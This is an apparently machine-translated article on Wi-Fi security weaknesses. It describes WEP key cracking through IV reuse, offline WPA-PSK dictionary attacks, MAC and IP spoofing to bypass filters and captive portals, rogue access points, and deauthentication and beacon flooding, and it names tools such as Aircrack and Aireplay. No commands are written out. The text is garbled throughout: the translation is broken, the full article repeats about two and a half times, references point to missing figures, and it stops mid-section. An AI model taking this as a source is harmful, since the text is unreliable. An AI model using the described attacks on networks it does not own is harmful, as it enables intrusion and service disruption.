Weaknesses / Threats Network Wifi (Wireless Fidelity.
Security issues is very important in computer networks, especially in wireless networks. The presence of a variety of vendors wireless products serving a variety of products at affordable prices contribute to drive widespread use of wireless technology. This wireless technology is not only suitable for use in office or business users. Home users can also use this technology to facilitate connectivity.
This paper is more intended to provide information on threats as well as quick and easy way to secure wireless networks. As already discussed in the beginning, wireless technology is relatively more vulnerable to security problems. As the name implies, wireless technology uses radio waves as a means of data transmission. Security processes will become more difficult because you can not see radio waves are used for data transmission.
Weaknesses of wireless networks can generally be divided into 2 types, namely the configuration weaknesses and shortcomings on the type of encryption used. One example of the causes for weaknesses in the current configuration to build a wireless network quite easily. Many vendors that provide facilities that enable the user or network admin, so often found in wireless that still use the default wireless configuration innate vendors. Often mounted on the wireless network is still using the default settings such as SSID congenital vendors, IP Address, remote management, DHCP enabled, channel frequency, without encryption and even user / password for the administration is still the standard wireless built factory.
WEP (Wired Equivalent Privacy) is a wireless security standard before, when it could be easily solved with a variety of tools that are available for free on the internet. WPA-PSK is considered to be a solution to replace WEP, now also has to be solved by the method of offline dictionary attack.
Some weaknesses in wireless networks that can be used to attack the attacker, among others:
1. Security Gap
Many wireless network users can not imagine what kind of dangers they are up to now are associated with the wireless access point (WAP), such as WLAN signals can be infiltrated by hackers. The following can be a threat in wireless networks, including:
- Sniffing to Eavesdrop
Package is access to data such as HTTP, email, and Iain, Iain, which is passed by wireless waves can be easily captured and analyzed by the attacker to use applications like Kismet packet sniffer.
- Denial of Service Attack
This type of attack is done by flooding (flooding) network so that wireless signals collide and produce packages are damaged.
- Man in the Middle Attack
Increased security with encryption and authentication techniques can still be penetrated with a way to find a weakness that the network protocol operation. One of them by exploiting the Address Resolution Protocol (ARP) in TCP / IP so that a clever hacker can take over the wireless network.
- Rogue / Unauthorized Access Point
Rogue APs can be installed by someone who wanted to disseminate / transmit again by a wireless transmission of illegal / unauthorized. The goal, the attacker can infiltrate the network through this wild AP.
- Configuring the access point that is not true
This condition is very much due to a lack of understanding in configuring the security system of AP.
Activities that threaten the security of wireless networks over done in a way that is known as Warchalking, WarDriving, WarFlying, WarSpamming, or WarSpying. The number of access point / base station that was built along with the low cost Internet connection to subscribe, cause hacking activities are often applied to Internet access illegally. Of course, without the need to pay.
2. Hide SSID
Many administrators hid Services Set Id (SSID) wireless network with the intention that they only know the SSID that can be connected to their network. This is not true, because the SSID is not disembuyikan perfectly. At a certain moment or especially when the client will connect (associate) or when it will decide itself (deauthentication) of a wireless network, then the client will continue to send SSID in plain text form (although using encryption), so if we intend to tap, be with easy to find information. Some tools that can be used to get the ssid that are hidden among others: kismet (kisMAC), ssid_jack (airjack), aircrack and much more. Kismet meupakan following applications which make sniffing cup.
3. WEP
Technology Wired Equivalency Privacy, or WEP is an encryption standard one of the most widely used. However, WEP encryption techniques are vulnerable, disturbing enough. That said, this security hole is very dangerous. No more important data that can pass safely. All data that has been encrypted will be solved even by the intruders. WEP weaknesses include:
• A key problem is weak, the RC4 algorithm used can be solved.
• WEP uses static keys
• Problem Initialization Vector (IV) WEP
• message integrity problems Cyclic Redundancy Check (CRC-32)
WEP consists of two levels, namely 64-bit key, and 128 bits. Actually, the secret key to the 64-bit WEP key is only 40 bits, 24 bits is an Initialization Vector (IV). Similarly, the 128-bit WEP key, the secret key consists of 104 bits.
Basically, each packet of data sent by using WEP encryption consists of the Initialization Vector (IV) and the encrypted data contains a checksum (section to check whether there are changes to the data sent). WEP weak point lies in the IV length 24 bits. An algorithm is usually used to calculate the encrypted code from the IV and the WEP key before it is sent over WLAN. Recipients will reconstruct the data with the data of IV and WEP key must have been determined. WEP standard recommends that the code is always different IV for each packet of data. Unfortunately, not all manufacturers do it.
WEP standard makers also did not mention how to make IV. In general, use of random generators. With the use of these generators, can be sure that sooner or later the same IV code will be used again. The researchers estimate that the same IV is used every packet of data 4000-5000. After learning the principles of the WEP, the intruder only needs to wait for the same IV used to then calculate the WEP key and then enter into the network. At this stage, the intruder can do anything in the wireless network. Software to do all these things can be obtained free on the Internet. With a little additional knowledge and training, open WEP encryption can be done easily. Armed with the software, anyone can learn to be an intruder.
Attack above takes time and packet enough, to shorten the time, the hackers usually do traffic injection. Traffic Injection is often done by collecting the ARP packet and then sends back to the access point. This resulted in the collection of initial vector easier and faster. Unlike the first and second attack, to attack traffic injection tools required specifications and specific applications that start are rarely found in stores, ranging from chipsets, firmware version, and versions of drivers, and not infrequently have to do patching of drivers and applications.
Applications that can be used to perform the packet capturing Airodump. Here is an example of applications that are airodump on mengcaptute WLAN packet. After sufficient data dicapture, conducted cracking process to find the WEP key. Applications that can be used to penetrate the Aircrack WEP encryption. Here is an example of successful application aircrak find the WEP key.
4. WPA-PSK or WPA2-PSK
WPA is a temporary security technology was created to replace the WEP key. There are two types of personal WPA (WPA-PSK), and WPA-RADIUS. We have already be on crack are WPA-PSK, ie the method of brute-force attack offline. Using brute force trial and error many words from a dictionary. This attack will succeed if the passphrase is used wireless does exist in the dictionary used the word hacker. To prevent any attacks on wireless security using WPA-PSK, use a passphrase that is long enough (one sentence).
5. MAC Filter
Almost every wireless access point or router is facilitated by the MAC filtering security. This is actually not much help in securing wireless communications, because the MAC address is very easy dispoofing or even altered. Tools ifconfig in OS Linux / Unix or various tools such as network utilitis, regedit, SMAC, machange on windows OS with easy to use for spoofing or changing the MAC address. Wifi still often found in offices and even the ISP (which is usually used by the cafe-cafe) that only use MAC filtering protection. By using applications such as wardriving kismet / aircrack tools kisMAC or can be obtained information of each client MAC addresses that are connected to an Access Point. After getting this information, we can connect to the Access point to change the MAC in accordance with the client earlier. In wireless networks, MAC address duplication does not result in conflict. Only requires a different IP client had. Here is a list of client MAC addresses that are connected to an access point by using the tools kismet. To change the network interface MAC address, just use simple tools like MAC makeup.
6. Captive Portal
Captive portals become a popular mechanism for community infrastructure and WiFi hotspot service that provides authentication for penguna infrastruktrur and IP flow management, such as, traffic shaping and bandwidth control, without the need to install specific applications on a user's computer. Authentication process can be performed safely through a regular web browser on the user side. Captive portals also have the potential to allow us to do things securely via SSL & IPSec and Rule Setting quality of service (QoS) per user, but the network retains the open nature of WiFi infrastructure.
Captive portal is actually a router or gateway machine to protect or not to allow any traffic to the user registration / authentication. Here's how the captive portal:
• Users with a wireless client allowed to connect wireless to get the IP address (DHCP)
• Block all traffic except that led to the captive portal (Registration / Web-based Authentication) which is located on the cable network.
• Redirect or steered all web traffic to a captive portal
• After the user registration or login, please allow access to the network (Internet)
Here's an example page from the captive portal login.
Some things to note, that the captive portal is only tracking client connections based on IP and MAC address after authenticating. This makes captive portal is used without authentication is possible because the IP and MAC address spoofing can be. The attack carried out by IP and MAC spoofing. MAC address spoofing as noted earlier. As for spoofing IP, required more effort that is by using ARP cache poisoning, by doing redirect traffic from clients who have previously connected.
Another attack that is easy enough to use Rogue AP, Access Point that is configured using the same components such information as the target AP SSID, BSSID to the channel frequency used. So when there is a client that will connect to the AP made by us, can we divert traffic to the real AP.
Not rare captive portal built on a hotspot has a weakness in its network configuration or design. For example, authentication is still using plain text (http), network management can be accessed via wireless (located on a network), and much more. Another weakness of the captive portal is that the communication traffic data or when it is authenticating (connected network) will be sent is still not encrypted, thus easily intercepted by hackers. For that we need to be careful to connect to the hotspot network, so try using a secure communication protocol such as https, pop3s, ssh, imaps ff.
7. Wardrive
Wardrive is an electronic fishing expedition to find a weak wireless networks. Most, most of these wireless networks are not even given a password or encryption to protect it. This activity is carried out to search for any network that will be the object of attack. Thus, we can conduct attacks on wireless networks that we have to target. Kegitan To do this, it only needs simple equipment. These activities generally aim to get an internet connection, but many are doing for the specific purposes ranging from a sense of curiosity, try try, research, lab work, crime etc..
Application for Site Survey / Wardrive "Netstumbler 0.4.0"
The first step in the experiment mengexploit a Wireless Network Access Point is found. Tools that can be used to do this is NetStumbler. These tools are used to couple easily find the Wireless Networking Signal. These tools can also measure the signal strength and noise generated because of the large reply Connectivitas to one Access Point.
The results of scanning and analysis of WLAN networks in the region surrounding cosmic kosan IT Telkom use tools NetStumbler:
Graph signal obtained using these tools in the SSID "ITTelkom":
8. Protocol Weaknesses in Wireless Networks
The weaknesses of wireless networks, is not free from weaknesses of various kinds of protocols used, among others:
8.1 EAPOL (Extensible Authentication Protocol).
EAPOL is a common type of protocol used for wireless authentication and point-to-point connection. As the official client sends the packet to the AP. AP receive and give responses, or the AP has made the authorization process. EAPOL protocol, there is a gap that can be used to obtain authentication value.
However, there are only authentication value at the beginning of the official client communication with the AP. Furthermore, if already connected, EAPOL protocol did not appear again, except during the next 10 thousand packages appeared. A hacker can send (injection) EAPOL packet containing the result of spoofing spoofing addresses that have been harmonized SSID, MAC Address and IP Address of the source / destination.
Official client sends EAPOL packet to get a response from the AP for authentication process. Furthermore, the AP will check to see ID Card from the client. Attacker using the protocol weakness by creating a fake ID card in order to be allowed entry by the AP and get a number to enter the same room.
8.2 Beacon Management.
Beacon Management is one type of protocol used by each AP to transmit RF signals to preach the existence of AP. When done Beacon protocol capture and decode it, would get the fact that in each of his transmision rate, Beacon management sent some information, such as SSID, encryption type, channel, MAC Address, and Iain, Iain.
Weakness (vulnerability) that can be used from this type of protocol is as follows. An attacker will capture client management package Beacon emitted by the AP. Furthermore, the attacker client will transmit back to the Beacon management package. Typically, the value of Beacon emitted by AP for 100ms. If the attacker caught Beacon client AP, then re-emit the Beacon, Beacon 2 will be the same. Source senders different, but contains the same information. This means that there are two APs the same SSID contains information, MAC Address, the same. As a result, the client can not communicate with the actual AP, unless the attacker to stop sending such a package Beacon.
8.3 Deauthentkation / Disassociation Protocol
The term commonly used to take advantage of this gap is called the protocol Deauthentication Broadcast Attack. This attack will flood the packet Deauthentication WLAN with wireless service so screwed up in the client. This type of attack is the most dangerous attack because it would break the connection target client or the client is associated with AP Attacker disconnection request by utilizing Deauthentication / Disassociation a direct response by the AP. If there is an ISP company affected by this attack, it will be a lot of complaints from customers due to rupture the entire client network.
Applications that can be used for this attack is Aireplay. Here is an example of applications of work being done Aircrak Broadcast Deauthentication Attack.
8.4 RF Signal Jamming
RF signals are electromagnetic waves that are used to exchange information over the air from one node to another node. Currently, the RF signals are widely used, such as for transmitting FM radio waves, television waves, or as a means of sending data over wireless networks.
RF signals have the advantage, but also has weaknesses. RF signals easily disturbed by RF-based systems other external, such as cordless phones, microwaves, Bluetooth devices, and Iainnya. When these devices are used simultaneously, the performance of wireless networks can be decreased significantly because of competition in the use of the same medium. In the end, such interference can cause errors in the bits of information that is being sent so that there re-transmission and delay to the user.
8.5 Probe-Request Management
When the first client attempts to connect itself with the AP, the AP will respond to the probe, to check whether the client request to enter the wireless network are allowed or not. Gap which can be used by the attacker is to manipulate the probe packet-respond. Next, the attacker made a request-respond probes. If the request is done by sending a request as much as possible, for example, 500 packets in 1 second, the AP will not be able to respond to the package so much. That is, AP no longer able to communicate with other clients. This paper is more intended to provide information on threats as well as quick and easy way to secure wireless networks. As already discussed in the beginning, wireless technology is relatively more vulnerable to security problems. As the name implies, wireless technology uses radio waves as a means of data transmission. Security processes will become more difficult because you can not see radio waves are used for data transmission.
Weaknesses of wireless networks can generally be divided into 2 types, namely the configuration weaknesses and shortcomings on the type of encryption used. One example of the causes for weaknesses in the current configuration to build a wireless network quite easily. Many vendors that provide facilities that enable the user or network admin, so often found in wireless that still use the default wireless configuration innate vendors. Often mounted on the wireless network is still using the default settings such as SSID congenital vendors, IP Address, remote management, DHCP enabled, channel frequency, without encryption and even user / password for the administration is still the standard wireless built factory.
WEP (Wired Equivalent Privacy) is a wireless security standard before, when it could be easily solved with a variety of tools that are available for free on the internet. WPA-PSK is considered to be a solution to replace WEP, now also has to be solved by the method of offline dictionary attack.
Some weaknesses in wireless networks that can be used to attack the attacker, among others:
1. Security Gap
Many wireless network users can not imagine what kind of dangers they are up to now are associated with the wireless access point (WAP), such as WLAN signals can be infiltrated by hackers. The following can be a threat in wireless networks, including:
- Sniffing to Eavesdrop
Package is access to data such as HTTP, email, and Iain, Iain, which is passed by wireless waves can be easily captured and analyzed by the attacker to use applications like Kismet packet sniffer.
- Denial of Service Attack
This type of attack is done by flooding (flooding) network so that wireless signals collide and produce packages are damaged.
- Man in the Middle Attack
Increased security with encryption and authentication techniques can still be penetrated with a way to find a weakness that the network protocol operation. One of them by exploiting the Address Resolution Protocol (ARP) in TCP / IP so that a clever hacker can take over the wireless network.
- Rogue / Unauthorized Access Point
Rogue APs can be installed by someone who wanted to disseminate / transmit again by a wireless transmission of illegal / unauthorized. The goal, the attacker can infiltrate the network through this wild AP.
- Configuring the access point that is not true
This condition is very much due to a lack of understanding in configuring the security system of AP.
Activities that threaten the security of wireless networks over done in a way that is known as Warchalking, WarDriving, WarFlying, WarSpamming, or WarSpying. The number of access point / base station that was built along with the low cost Internet connection to subscribe, cause hacking activities are often applied to Internet access illegally. Of course, without the need to pay.
2. Hide SSID
Many administrators hid Services Set Id (SSID) wireless network with the intention that they only know the SSID that can be connected to their network. This is not true, because the SSID is not disembuyikan perfectly. At a certain moment or especially when the client will connect (associate) or when it will decide itself (deauthentication) of a wireless network, then the client will continue to send SSID in plain text form (although using encryption), so if we intend to tap, be with easy to find information. Some tools that can be used to get the ssid that are hidden among others: kismet (kisMAC), ssid_jack (airjack), aircrack and much more. Kismet meupakan following applications which make sniffing cup.
3. WEP
Technology Wired Equivalency Privacy, or WEP is an encryption standard one of the most widely used. However, WEP encryption techniques are vulnerable, disturbing enough. That said, this security hole is very dangerous. No more important data that can pass safely. All data that has been encrypted will be solved even by the intruders. WEP weaknesses include:
• A key problem is weak, the RC4 algorithm used can be solved.
• WEP uses static keys
• Problem Initialization Vector (IV) WEP
• message integrity problems Cyclic Redundancy Check (CRC-32)
WEP consists of two levels, namely 64-bit key, and 128 bits. Actually, the secret key to the 64-bit WEP key is only 40 bits, 24 bits is an Initialization Vector (IV). Similarly, the 128-bit WEP key, the secret key consists of 104 bits.
Basically, each packet of data sent by using WEP encryption consists of the Initialization Vector (IV) and the encrypted data contains a checksum (section to check whether there are changes to the data sent). WEP weak point lies in the IV length 24 bits. An algorithm is usually used to calculate the encrypted code from the IV and the WEP key before it is sent over WLAN. Recipients will reconstruct the data with the data of IV and WEP key must have been determined. WEP standard recommends that the code is always different IV for each packet of data. Unfortunately, not all manufacturers do it.
WEP standard makers also did not mention how to make IV. In general, use of random generators. With the use of these generators, can be sure that sooner or later the same IV code will be used again. The researchers estimate that the same IV is used every packet of data 4000-5000. After learning the principles of the WEP, the intruder only needs to wait for the same IV used to then calculate the WEP key and then enter into the network. At this stage, the intruder can do anything in the wireless network. Software to do all these things can be obtained free on the Internet. With a little additional knowledge and training, open WEP encryption can be done easily. Armed with the software, anyone can learn to be an intruder.
Attack above takes time and packet enough, to shorten the time, the hackers usually do traffic injection. Traffic Injection is often done by collecting the ARP packet and then sends back to the access point. This resulted in the collection of initial vector easier and faster. Unlike the first and second attack, to attack traffic injection tools required specifications and specific applications that start are rarely found in stores, ranging from chipsets, firmware version, and versions of drivers, and not infrequently have to do patching of drivers and applications.
Applications that can be used to perform the packet capturing Airodump. Here is an example of applications that are airodump on mengcaptute WLAN packet. After sufficient data dicapture, conducted cracking process to find the WEP key. Applications that can be used to penetrate the Aircrack WEP encryption. Here is an example of successful application aircrak find the WEP key.
4. WPA-PSK or WPA2-PSK
WPA is a temporary security technology was created to replace the WEP key. There are two types of personal WPA (WPA-PSK), and WPA-RADIUS. We have already be on crack are WPA-PSK, ie the method of brute-force attack offline. Using brute force trial and error many words from a dictionary. This attack will succeed if the passphrase is used wireless does exist in the dictionary used the word hacker. To prevent any attacks on wireless security using WPA-PSK, use a passphrase that is long enough (one sentence).
5. MAC Filter
Almost every wireless access point or router is facilitated by the MAC filtering security. This is actually not much help in securing wireless communications, because the MAC address is very easy dispoofing or even altered. Tools ifconfig in OS Linux / Unix or various tools such as network utilitis, regedit, SMAC, machange on windows OS with easy to use for spoofing or changing the MAC address. Wifi still often found in offices and even the ISP (which is usually used by the cafe-cafe) that only use MAC filtering protection. By using applications such as wardriving kismet / aircrack tools kisMAC or can be obtained information of each client MAC addresses that are connected to an Access Point. After getting this information, we can connect to the Access point to change the MAC in accordance with the client earlier. In wireless networks, MAC address duplication does not result in conflict. Only requires a different IP client had. Here is a list of client MAC addresses that are connected to an access point by using the tools kismet. To change the network interface MAC address, just use simple tools like MAC makeup.
6. Captive Portal
Captive portals become a popular mechanism for community infrastructure and WiFi hotspot service that provides authentication for penguna infrastruktrur and IP flow management, such as, traffic shaping and bandwidth control, without the need to install specific applications on a user's computer. Authentication process can be performed safely through a regular web browser on the user side. Captive portals also have the potential to allow us to do things securely via SSL & IPSec and Rule Setting quality of service (QoS) per user, but the network retains the open nature of WiFi infrastructure.
Captive portal is actually a router or gateway machine to protect or not to allow any traffic to the user registration / authentication. Here's how the captive portal:
• Users with a wireless client allowed to connect wireless to get the IP address (DHCP)
• Block all traffic except that led to the captive portal (Registration / Web-based Authentication) which is located on the cable network.
• Redirect or steered all web traffic to a captive portal
• After the user registration or login, please allow access to the network (Internet)
Here's an example page from the captive portal login.
Some things to note, that the captive portal is only tracking client connections based on IP and MAC address after authenticating. This makes captive portal is used without authentication is possible because the IP and MAC address spoofing can be. The attack carried out by IP and MAC spoofing. MAC address spoofing as noted earlier. As for spoofing IP, required more effort that is by using ARP cache poisoning, by doing redirect traffic from clients who have previously connected.
Another attack that is easy enough to use Rogue AP, Access Point that is configured using the same components such information as the target AP SSID, BSSID to the channel frequency used. So when there is a client that will connect to the AP made by us, can we divert traffic to the real AP.
Not rare captive portal built on a hotspot has a weakness in its network configuration or design. For example, authentication is still using plain text (http), network management can be accessed via wireless (located on a network), and much more. Another weakness of the captive portal is that the communication traffic data or when it is authenticating (connected network) will be sent is still not encrypted, thus easily intercepted by hackers. For that we need to be careful to connect to the hotspot network, so try using a secure communication protocol such as https, pop3s, ssh, imaps ff.
7. Wardrive
Wardrive is an electronic fishing expedition to find a weak wireless networks. Most, most of these wireless networks are not even given a password or encryption to protect it. This activity is carried out to search for any network that will be the object of attack. Thus, we can conduct attacks on wireless networks that we have to target. Kegitan To do this, it only needs simple equipment. These activities generally aim to get an internet connection, but many are doing for the specific purposes ranging from a sense of curiosity, try try, research, lab work, crime etc..
Application for Site Survey / Wardrive "Netstumbler 0.4.0"
The first step in the experiment mengexploit a Wireless Network Access Point is found. Tools that can be used to do this is NetStumbler. These tools are used to couple easily find the Wireless Networking Signal. These tools can also measure the signal strength and noise generated because of the large reply Connectivitas to one Access Point.
The results of scanning and analysis of WLAN networks in the region surrounding cosmic kosan IT Telkom use tools NetStumbler:
Graph signal obtained using these tools in the SSID "ITTelkom":
8. Protocol Weaknesses in Wireless Networks
The weaknesses of wireless networks, is not free from weaknesses of various kinds of protocols used, among others:
8.1 EAPOL (Extensible Authentication Protocol).
EAPOL is a common type of protocol used for wireless authentication and point-to-point connection. As the official client sends the packet to the AP. AP receive and give responses, or the AP has made the authorization process. EAPOL protocol, there is a gap that can be used to obtain authentication value.
However, there are only authentication value at the beginning of the official client communication with the AP. Furthermore, if already connected, EAPOL protocol did not appear again, except during the next 10 thousand packages appeared. A hacker can send (injection) EAPOL packet containing the result of spoofing spoofing addresses that have been harmonized SSID, MAC Address and IP Address of the source / destination.
Official client sends EAPOL packet to get a response from the AP for authentication process. Furthermore, the AP will check to see ID Card from the client. Attacker using the protocol weakness by creating a fake ID card in order to be allowed entry by the AP and get a number to enter the same room.
8.2 Beacon Management.
Beacon Management is one type of protocol used by each AP to transmit RF signals to preach the existence of AP. When done Beacon protocol capture and decode it, would get the fact that in each of his transmision rate, Beacon management sent some information, such as SSID, encryption type, channel, MAC Address, and Iain, Iain.
Weakness (vulnerability) that can be used from this type of protocol is as follows. An attacker will capture client management package Beacon emitted by the AP. Furthermore, the attacker client will transmit back to the Beacon management package. Typically, the value of Beacon emitted by AP for 100ms. If the attacker caught Beacon client AP, then re-emit the Beacon, Beacon 2 will be the same. Source senders different, but contains the same information. This means that there are two APs the same SSID contains information, MAC Address, the same. As a result, the client can not communicate with the actual AP, unless the attacker to stop sending such a package Beacon.
8.3 Deauthentkation / Disassociation Protocol
The term commonly used to take advantage of this gap is called the protocol Deauthentication Broadcast Attack. This attack will flood the packet Deauthentication WLAN with wireless service so screwed up in the client. This type of attack is the most dangerous attack because it would break the connection target client or the client is associated with AP Attacker disconnection request by utilizing Deauthentication / Disassociation a direct response by the AP. If there is an ISP company affected by this attack, it will be a lot of complaints from customers due to rupture the entire client network.
Applications that can be used for this attack is Aireplay. Here is an example of applications of work being done Aircrak Broadcast Deauthentication Attack.
8.4 RF Signal Jamming
RF signals are electromagnetic waves that are used to exchange information over the air from one node to another node. Currently, the RF signals are widely used, such as for transmitting FM radio waves, television waves, or as a means of sending data over wireless networks.
RF signals have the advantage, but also has weaknesses. RF signals easily disturbed by RF-based systems other external, such as cordless phones, microwaves, Bluetooth devices, and Iainnya. When these devices are used simultaneously, the performance of wireless networks can be decreased significantly because of competition in the use of the same medium. In the end, such interference can cause errors in the bits of information that is being sent so that there re-transmission and delay to the user.
8.5 Probe-Request Management
When the first client attempts to connect itself with the AP, the AP will respond to the probe, to check whether the client request to enter the wireless network are allowed or not. Gap which can be used by the attacker is to manipulate the probe packet-respond. Next, the attacker made a request-respond probes. If the request is done by sending a request as much as possible, for example, 500 packets in 1 second, the AP will not be able to respond to the package so much. That is, AP no longer able to communicate with other clients. This paper is more intended to provide information on threats as well as quick and easy way to secure wireless networks. As already discussed in the beginning, wireless technology is relatively more vulnerable to security problems. As the name implies, wireless technology uses radio waves as a means of data transmission. Security processes will become more difficult because you can not see radio waves are used for data transmission.
Weaknesses of wireless networks can generally be divided into 2 types, namely the configuration weaknesses and shortcomings on the type of encryption used. One example of the causes for weaknesses in the current configuration to build a wireless network quite easily. Many vendors that provide facilities that enable the user or network admin, so often found in wireless that still use the default wireless configuration innate vendors. Often mounted on the wireless network is still using the default settings such as SSID congenital vendors, IP Address, remote management, DHCP enabled, channel frequency, without encryption and even user / password for the administration is still the standard wireless built factory.
WEP (Wired Equivalent Privacy) is a wireless security standard before, when it could be easily solved with a variety of tools that are available for free on the internet. WPA-PSK is considered to be a solution to replace WEP, now also has to be solved by the method of offline dictionary attack.
Some weaknesses in wireless networks that can be used to attack the attacker, among others:
1. Security Gap
Many wireless network users can not imagine what kind of dangers they are up to now are associated with the wireless access point (WAP), such as WLAN signals can be infiltrated by hackers. The following can be a threat in wireless networks, including:
- Sniffing to Eavesdrop
Package is access to data such as HTTP, email, and Iain, Iain, which is passed by wireless waves can be easily captured and analyzed by the attacker to use applications like Kismet packet sniffer.
- Denial of Service Attack
This type of attack is done by flooding (flooding) network so that wireless signals collide and produce packages are damaged.
- Man in the Middle Attack
Increased security with encryption and authentication techniques can still be penetrated with a way to find a weakness that the network protocol operation. One of them by exploiting the Address Resolution Protocol (ARP) in TCP / IP so that a clever hacker can take over the wireless network.
- Rogue / Unauthorized Access Point
Rogue APs can be installed by someone who wanted to disseminate / transmit again by a wireless transmission of illegal / unauthorized. The goal, the attacker can infiltrate the network through this wild AP.
- Configuring the access point that is not true
This condition is very much due to a lack of understanding in configuring the security system of AP.
Activities that threaten the security of wireless networks over done in a way that is known as Warchalking, WarDriving, WarFlying, WarSpamming, or WarSpying. The number of access point / base station that was built along with the low cost Internet connection to subscribe, cause hacking activities are often applied to Internet access illegally. Of course, without the need to pay.
2. Hide SSID
Many administrators hid Services Set Id (SSID) wireless network with the intention that they only know the SSID that can be connected to their network. This is not true, because the SSID is not disembuyikan perfectly. At a certain moment or especially when the client will connect (associate) or when it will decide itself (deauthentication) of a wireless network, then the client will continue to send SSID in plain text form (although using encryption), so if we intend to tap, be with easy to find information. Some tools that can be used to get the ssid that are hidden among others: kismet (kisMAC), ssid_jack (airjack), aircrack and much more. Kismet meupakan following applications which make sniffing cup.
3. WEP
Technology Wired Equivalency Privacy, or WEP is an encryption standard one of the most widely used. However, WEP encryption techniques are vulnerable, disturbing enough. That said, this security hole is very dangerous. No more important data that can pass safely. All data that has been encrypted will be solved even by the intruders. WEP weaknesses include:
• A key problem is weak, the RC4 algorithm used can be solved.
• WEP uses static keys
• Problem Initialization Vector (IV) WEP
• message integrity problems Cyclic Redundancy Check (CRC-32)
WEP consists of two levels, namely 64-bit key, and 128 bits. Actually, the secret key to the 64-bit WEP key is only 40 bits, 24 bits is an Initialization Vector (IV). Similarly, the 128-bit WEP key, the secret key consists of 104 bits.
Basically, each packet of data sent by using WEP encryption consists of the Initialization Vector (IV) and the encrypted data contains a checksum (section to check whether there are changes to the data sent). WEP weak point lies in the IV length 24 bits. An algorithm is usually used to calculate the encrypted code from the IV and the WEP key before it is sent over WLAN. Recipients will reconstruct the data with the data of IV and WEP key must have been determined. WEP standard recommends that the code is always different IV for each packet of data. Unfortunately, not all manufacturers do it.
WEP standard makers also did not mention how to make IV. In general, use of random generators. With the use of these generators, can be sure that sooner or later the same IV code will be used again. The researchers estimate that the same IV is used every packet of data 4000-5000. After learning the principles of the WEP, the intruder only needs to wait for the same IV used to then calculate the WEP key and then enter into the network. At this stage, the intruder can do anything in the wireless network. Software to do all these things can be obtained free on the Internet. With a little additional knowledge and training, open WEP encryption can be done easily. Armed with the software, anyone can learn to be an intruder.
Attack above takes time and packet enough, to shorten the time, the hackers usually do traffic injection. Traffic Injection is often done by collecting the ARP packet and then sends back to the access point. This resulted in the collection of initial vector easier and faster. Unlike the first and second attack, to attack traffic injection tools required specifications and specific applications that start are rarely found in stores, ranging from chipsets, firmware version, and versions of drivers, and not infrequently have to do patching of drivers and applications.
Applications that can be used to perform the packet capturing Airodump. Here is an example of applications that are airodump on mengcaptute WLAN packet. After sufficient data dicapture, conducted cracking process to find the WEP key. Applications that can be used to penetrate the Aircrack WEP encryption. Here is an example of successful application aircrak find the WEP key.
4. WPA-PSK or WPA2-PSK
WPA is a temporary security technology was created to replace the WEP key. There are two types of personal WPA (WPA-PSK), and WPA-RADIUS. We have already be on crack are WPA-PSK, ie the method of brute-force attack offline. Using brute force trial and error many words from a dictionary. This attack will succeed if the passphrase is used wireless does exist in the dictionary used the word hacker. To prevent any attacks on wireless security using WPA-PSK, use a passphrase that is long enough (one sentence).
5. MAC Filter
Almost every wireless access point or router is facilitated by the MAC filtering security. This is actually not much help in securing wireless communications, because the MAC address is very easy dispoofing or even altered. Tools ifconfig in OS Linux / Unix or various tools such as network utilitis, regedit, SMAC, machange on windows OS with easy to use for spoofing or changing the MAC address. Wifi still often found in offices and even the ISP (which is usually used by the cafe-cafe) that only use MAC filtering protection. By using applications such as wardriving kismet / aircrack tools kisMAC or can be obtained information of each client MAC addresses that are connected to an Access Point. After getting this information, we can connect to the Access point to change the MAC in accordance with the client earlier. In wireless networks, MAC address duplication does not result in conflict. Only requires a different IP client had. Here is a list of client MAC addresses that are connected to an access point by using the tools kismet. To change the network interface MAC address, just use simple tools like MAC makeup.
6. Captive Portal
Captive portals become a popular mechanism for community infrastructure and WiFi hotspot service that provides authentication for penguna infrastruktrur and IP flow management, such as, traffic shaping and bandwidth control, without the need to install specific applications on a user's computer. Authentication process can be performed safely through a regular web browser on the user side. Captive portals also have the potential to allow us to do things securely via SSL & IPSec and Rule Setting quality of service (QoS) per user, but the network retains the open nature of WiFi infrastructure.
Captive portal is actually a router or gateway machine to protect or not to allow any traffic to the user registration / authentication. Here's how the captive portal:
• Users with a wireless client allowed to connect wireless to get the IP address (DHCP)
• Block all traffic except that led to the captive portal (Registration / Web-based Authentication) which is located on the cable network.
• Redirect or steered all web traffic to a captive portal
• After the user registration or login, please allow access to the network (Internet)
Here's an example page from the captive portal login.
Some things to note, that the captive portal is only tracking client connections based on IP and MAC address after authenticating. This makes captive portal is used without authentication is possible because the IP and MAC address spoofing can be. The attack carried out by IP and MAC spoofing. MAC address spoofing as noted earlier. As for spoofing IP, required more effort that is by using ARP cache poisoning, by doing redirect traffic from clients who have previously connected.
Another attack that is easy enough to use Rogue AP, Access Point that is configured using the same components such information as the target AP SSID, BSSID to the channel frequency used. So when there is a client that will connect to the AP made by us, can we divert traffic to the real AP.
Not rare captive portal built on a hotspot has a weakness in its network configuration or design. For example, authentication is still using plain text (http), network management can be accessed via wireless (located on a network), and much more. Another weakness of the captive portal is that the communication traffic data or when it is authenticating (connected network) will be sent is still not encrypted, thus easily intercepted by hackers. For that we need to be careful to connect to the hotspot network, so try using a secure communication protocol such as https, pop3s, ssh, imaps ff.
7. Wardrive
Wardrive is an electronic fishing expedition to find a weak wireless networks. Most, most of these wireless networks are not even given a password or encryption to protect it. This activity is carried out to search for any network that will be the object of attack. Thus, we can conduct attacks on wireless networks that we have to target. Kegitan To do this, it only needs simple equipment. These activities generally aim to get an internet connection, but many are doing for the specific purposes ranging from a sense of curiosity, try try, research, lab work, crime etc..
Application for Site Survey / Wardrive "Netstumbler 0.4.0"
The first step in the experiment mengexploit a Wireless Network Access Point is found. Tools that can be used to do this is NetStumbler. These tools are used to couple easily find the Wireless Networking Signal. These tools can also measure the signal strength and noise generated because of the large reply Connectivitas to one Access Point.
The results of scanning and analysis of WLAN networks in the region surrounding cosmic kosan IT Telkom use tools NetStumbler:
Graph signal obtained using these tools in the SSID "ITTelkom":
8. Protocol Weaknesses in Wireless Networks
The weaknesses of wireless networks, is not free from weaknesses of various kinds of protocols used, among others:
8.1 EAPOL (Extensible Authentication Protocol).
EAPOL is a common type of protocol used for wireless authentication and point-to-point connection. As the official client sends the packet to the AP. AP receive and give responses, or the AP has made the authorization process. EAPOL protocol, there is a gap that can be used to obtain authentication value.
